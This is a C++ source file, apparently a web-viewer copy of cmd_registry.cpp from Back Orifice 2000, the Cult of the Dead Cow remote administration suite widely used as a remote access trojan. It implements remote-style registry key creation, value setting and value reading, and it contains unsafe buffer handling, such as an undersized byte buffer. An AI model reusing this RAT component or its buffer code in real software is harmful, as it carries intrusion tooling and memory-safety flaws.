📄 cmd_registry.cpp
字号:
/* Back Orifice 2000 - Remote Administration Suite
Copyright (C) 1999, Cult Of The Dead Cow
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
The author of this program may be contacted at dildog@l0pht.com. */
#include "stdafx.h"
#include "..\\Ctrl_Srvr9.h"
#include "..\\MainFrm.h"
#include "cmd_registry.h"
#include "strhandle.h"
#include "func_bo.h"
char *GetRootKey(char *svPath, HKEY *pKey)
{
char *svNext;
if(svPath==NULL) return NULL;
if(strncmp(svPath,"\\\\",2)==0) svPath+=2;
else if(strncmp(svPath,"\\",1)==0) svPath++;
svNext=BreakString(svPath,"\\");
if((lstrcmpi(svPath,"HKEY_CLASSES_ROOT")==0) ||
(lstrcmpi(svPath,"HKCR")==0) ) *pKey = HKEY_CLASSES_ROOT;
else if((lstrcmpi(svPath,"HKEY_CURRENT_USER")==0) ||
(lstrcmpi(svPath,"HKCU")==0) ) *pKey = HKEY_CURRENT_USER;
else if((lstrcmpi(svPath,"HKEY_LOCAL_MACHINE")==0) ||
(lstrcmpi(svPath,"HKLM")==0) ) *pKey = HKEY_LOCAL_MACHINE;
else if((lstrcmpi(svPath,"HKEY_USERS")==0) ||
(lstrcmpi(svPath,"HKU")==0) ) *pKey = HKEY_USERS;
else if((lstrcmpi(svPath,"HKEY_CURRENT_CONFIG")==0) ||
(lstrcmpi(svPath,"HKCC")==0) ) *pKey = HKEY_CURRENT_CONFIG;
else if((lstrcmpi(svPath,"HKEY_DYN_DATA")==0) ||
(lstrcmpi(svPath,"HKDD")==0) ) *pKey = HKEY_DYN_DATA;
else {
return NULL;
}
return svNext;
}
int CmdProc_RegCreateKey(char *strRegName)
{
char svBuffer[1024];
CMainFrame *pMainWnd = (CMainFrame *)AfxGetApp ()->m_pMainWnd;
// Get root key
HKEY key,subkey;
char *svKey,*svNext;
svKey=GetRootKey(strRegName,&key);
if(svKey==NULL)
{
pMainWnd->SendStringMsg ("MSG: Could not create key. Invalid root key.");
// IssueAuthCommandReply(cas_from,comid,0,"Could not create key. Invalid root key.");
return -1;
}
// Create/open key hierarchy
DWORD dwDisp,dwPerm=KEY_READ;
int nCount;
nCount=0;
while(svKey!=NULL)
{
svNext=BreakString(svKey,"\\");
if(svNext==NULL) dwPerm=KEY_READ|KEY_WRITE;
if(RegCreateKeyEx(key, svKey, 0, "", REG_OPTION_NON_VOLATILE, dwPerm, NULL, &subkey, &dwDisp) != ERROR_SUCCESS)
{
if(key!=HKEY_LOCAL_MACHINE && key!=HKEY_USERS && key!=HKEY_CLASSES_ROOT && key!=HKEY_CURRENT_USER && key!=HKEY_CURRENT_CONFIG && key!=HKEY_DYN_DATA)
RegCloseKey(key);
wsprintf(svBuffer,"MSG: Could not create key. Unable to open subkey: %.256s", svKey);
pMainWnd->SendStringMsg ((LPCTSTR)svBuffer);
// IssueAuthCommandReply(cas_from,comid,0,svBuffer);
return -1;
}
if(dwDisp==REG_CREATED_NEW_KEY) nCount++;
if(key!=HKEY_LOCAL_MACHINE && key!=HKEY_USERS && key!=HKEY_CLASSES_ROOT && key!=HKEY_CURRENT_USER && key!=HKEY_CURRENT_CONFIG && key!=HKEY_DYN_DATA)
RegCloseKey(key);
key = subkey;
svKey = svNext;
}
if(key!=HKEY_LOCAL_MACHINE && key!=HKEY_USERS && key!=HKEY_CLASSES_ROOT && key!=HKEY_CURRENT_USER && key!=HKEY_CURRENT_CONFIG && key!=HKEY_DYN_DATA)
RegCloseKey(key);
// Report number of keys created in the process
if(nCount==1)
{
wsprintf(svBuffer, "MSG: Created %d key.", nCount);
}
else
{
wsprintf(svBuffer, "MSG: Created %d keys.", nCount);
}
pMainWnd->SendStringMsg ((LPCTSTR)svBuffer);
// IssueAuthCommandReply(cas_from,comid,0,svBuffer);
return 0;
}
int CmdProc_RegSetValue(char *strRegName, char *strRegValue)
{
char svBuffer[1024];
CMainFrame *pMainWnd = (CMainFrame *)AfxGetApp ()->m_pMainWnd;
// Get root key
char *svKey;
HKEY key;
svKey=GetRootKey(strRegName,&key);
if(svKey==NULL)
{
pMainWnd->SendStringMsg ("MSG: Could not set value. Invalid root key");
// IssueAuthCommandReply(cas_from,comid,0,"Could not set value. Invalid root key.");
return -1;
}
// Get registry value type/name/data
char *svType, *svName, *svData, *svNext, *pData;
int nDataLen,nOrigLen;
svType=strRegValue;
svName=BreakString(svType,"(");
if(svName==NULL)
{
pMainWnd->SendStringMsg ("MSG: Could not set value. Invalid value name string.");
// IssueAuthCommandReply(cas_from,comid,0,"Could not set value. Invalid value name string.");
return 1;
}
svData=BreakString(svName,"):");
if(svData==NULL)
{
pMainWnd->SendStringMsg ("MSG: Could not set value. Invalid value name string.");
// IssueAuthCommandReply(cas_from,comid,0,"Could not set value. Invalid value name string.");
return 1;
}
CharUpper(svType);
// Process value type and parse data
DWORD dwType;
dwType = REG_NONE;
switch(svType[0]) {
case 'B':
dwType=REG_BINARY;
nDataLen=lstrlen(svData)/3;
pData=(char *) malloc(nDataLen);
CharUpper(svData);
nDataLen=0;
while(svData!=NULL) {
char c;
svNext=BreakString(svData," ");
c=0;
while(*svData) {
c<<=4;
if(*svData>='A' && *svData<='F') c|=*svData-'A'+0xA;
else if(*svData>='0' && *svData<='9') c|=*svData-'0';
svData++;
}
*(pData+nDataLen)=c;
nDataLen++;
svData=svNext;
}
break;
case 'D':
dwType=REG_DWORD;
nDataLen=4;
pData=(char *)malloc(sizeof(DWORD));
CharUpper(svData);
if(strncmp(svData,"0X",2)==0) {
DWORD val;
val=0;
svData+=2;
while(*svData) {
val<<=4;
if(*svData>='A' && *svData<='F') val|=*svData-'A'+0xA;
else if(*svData>='0' && *svData<='9') val|=*svData-'0';
svData++;
}
*(DWORD *)pData=val;
} else {
*(DWORD *)pData=atol(svData);
}
break;
case 'S':
dwType=REG_SZ;
pData=(char *)malloc(lstrlen(svData)+1);
UnescapeString(svData);
lstrcpy(pData,svData);
nDataLen=lstrlen(pData)+1;
break;
case 'M':
if(!g_bIsWinNT)
{
pMainWnd->SendStringMsg ("MSG: Could not set value. MULTI_SZ only supported by Windows NT.");
// IssueAuthCommandReply(cas_from,comid,0,"Could not set value. MULTI_SZ only supported by Windows NT.");
return -1;
}
dwType=REG_MULTI_SZ;
nOrigLen=lstrlen(svData);
pData=(char *)malloc(nOrigLen+2);
UnescapeString(svData);
nDataLen=0;
while((!(*(pData+nDataLen)=='\0' && *(pData+nDataLen+1)=='\0')) && nDataLen<nOrigLen) nDataLen++;
*(pData+nDataLen)='\0';
*(pData+nDataLen+1)='\0';
nDataLen++;
break;
case 'E':
dwType=REG_EXPAND_SZ;
pData=(char *)malloc(lstrlen(svData)+1);
UnescapeString(svData);
lstrcpy(pData,svData);
nDataLen=lstrlen(pData)+1;
break;
default:
wsprintf(svBuffer, "MSG: Could not set value. Unknown data type '%c'. Valid types are B,D,S,M,E.", svType[0]);
pMainWnd->SendStringMsg ((LPCTSTR)svBuffer);
// IssueAuthCommandReply(cas_from,comid,0,svBuffer);
return -1;
}
// Find Key
// Open key hierarchy
HKEY subkey;
DWORD dwPerm=KEY_READ;
while(svKey!=NULL)
{
svNext=BreakString(svKey,"\\");
if(svNext==NULL) dwPerm=KEY_READ|KEY_WRITE;
if(RegOpenKeyEx(key, svKey, 0, dwPerm, &subkey) != ERROR_SUCCESS) {
if(key!=HKEY_LOCAL_MACHINE && key!=HKEY_USERS && key!=HKEY_CLASSES_ROOT && key!=HKEY_CURRENT_USER && key!=HKEY_CURRENT_CONFIG && key!=HKEY_DYN_DATA)
RegCloseKey(key);
wsprintf(svBuffer,"MSG: Unable to open subkey: %.256s", svKey);
pMainWnd->SendStringMsg ((LPCTSTR)svBuffer);
// IssueAuthCommandReply(cas_from,comid,0,svBuffer);
free(pData);
return -1;
}
if(key!=HKEY_LOCAL_MACHINE && key!=HKEY_USERS && key!=HKEY_CLASSES_ROOT && key!=HKEY_CURRENT_USER && key!=HKEY_CURRENT_CONFIG && key!=HKEY_DYN_DATA)
RegCloseKey(key);
key = subkey;
svKey = svNext;
}
// Write value
RegSetValueEx(key,svName, 0, dwType, (BYTE *) pData, nDataLen);
if(key!=HKEY_LOCAL_MACHINE && key!=HKEY_USERS && key!=HKEY_CLASSES_ROOT && key!=HKEY_CURRENT_USER)
RegCloseKey(key);
// pMainWnd->SendStringMsg ("Value set.");
// IssueAuthCommandReply(cas_from,comid,0,"Value set.");
free(pData);
return 0;
}
int CmdProc_RegGetValue(char *strRegName, char *strRegValue)
{
char svBuffer[1024];
CMainFrame *pMainWnd = (CMainFrame *)AfxGetApp ()->m_pMainWnd;
// Get root key
char *svKey,*svNext;
HKEY key;
svKey=GetRootKey(strRegName,&key);
if(svKey==NULL)
{
pMainWnd->SendStringMsg ("MSG: Could not open key. Invalid root key.");
// IssueAuthCommandReply(cas_from,comid,0,"Could not open key. Invalid root key.");
return -1;
}
// Open key hierarchy
HKEY subkey;
DWORD dwPerm=KEY_READ;
while(svKey!=NULL)
{
svNext=BreakString(svKey,"\\");
if(svNext==NULL) dwPerm=KEY_WRITE | KEY_READ;
if(RegOpenKeyEx(key, svKey, 0, dwPerm, &subkey) != ERROR_SUCCESS) {
if(key!=HKEY_LOCAL_MACHINE && key!=HKEY_USERS && key!=HKEY_CLASSES_ROOT && key!=HKEY_CURRENT_USER && key!=HKEY_CURRENT_CONFIG && key!=HKEY_DYN_DATA)
RegCloseKey(key);
wsprintf(svBuffer,"MSG: Could not open key. Unable to open subkey: %.256s", svKey);
pMainWnd->SendStringMsg ((LPCTSTR)svBuffer);
// IssueAuthCommandReply(cas_from,comid,0,svBuffer);
return -1;
}
if(key!=HKEY_LOCAL_MACHINE && key!=HKEY_USERS && key!=HKEY_CLASSES_ROOT && key!=HKEY_CURRENT_USER && key!=HKEY_CURRENT_CONFIG && key!=HKEY_DYN_DATA)
RegCloseKey(key);
key = subkey;
svKey = svNext;
}
BYTE *pData;
DWORD dwType,dwLen;
RegQueryValueEx(key,strRegValue,NULL,&dwType,NULL,&dwLen);
if(dwLen>=8192)
{
RegCloseKey(key);
pMainWnd->SendStringMsg ("MSG: Could not get value. Value too long.");
// IssueAuthCommandReply(cas_from,comid,0,"Could not get value. Value too long.");
return -1;
}
pData=(BYTE *)malloc(dwLen);
RegQueryValueEx(key,strRegValue,NULL,&dwType,pData,&dwLen);
wsprintf(svBuffer,"MSG: Value: %lu bytes.",dwLen);
pMainWnd->SendStringMsg ((LPCTSTR)svBuffer);
// IssueAuthCommandReply(cas_from,comid,1,svBuffer);
// Process value type and parse data
char svStr[260],*svPtr,*svMem,*sv;
DWORD dw,dwCount;
switch(dwType)
{
case REG_BINARY:
dw=0;
while(dw<dwLen)
{
svStr[0]='\0';
dwCount=min(dwLen-dw,16);
while(dwCount>0)
{
char svByte[3];
if(dwCount==1)
{
wsprintf(svByte,"MSG: %2.2X",*(pData+dw));
lstrcat(svStr,svByte);
}
else
{
wsprintf(svByte,"MSG: %2.2X ",*(pData+dw));
lstrcat(svStr,svByte);
}
dw++;
dwCount--;
}
pMainWnd->SendStringMsg ((LPCTSTR)svStr);
// IssueAuthCommandReply(cas_from,comid,1,svStr);
}
break;
case REG_DWORD:
wsprintf(svStr,"MSG: %lu",*(DWORD *)pData);
pMainWnd->SendStringMsg ((LPCTSTR)svStr);
// IssueAuthCommandReply(cas_from,comid,1,svStr);
break;
case REG_EXPAND_SZ:
case REG_SZ:
svPtr=EscapeString((char *)pData);
svMem=(char *)malloc(lstrlen(svPtr)+7);;//+2);
lstrcpy (svMem,"MSG: ");
lstrcat(svMem,svPtr);
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -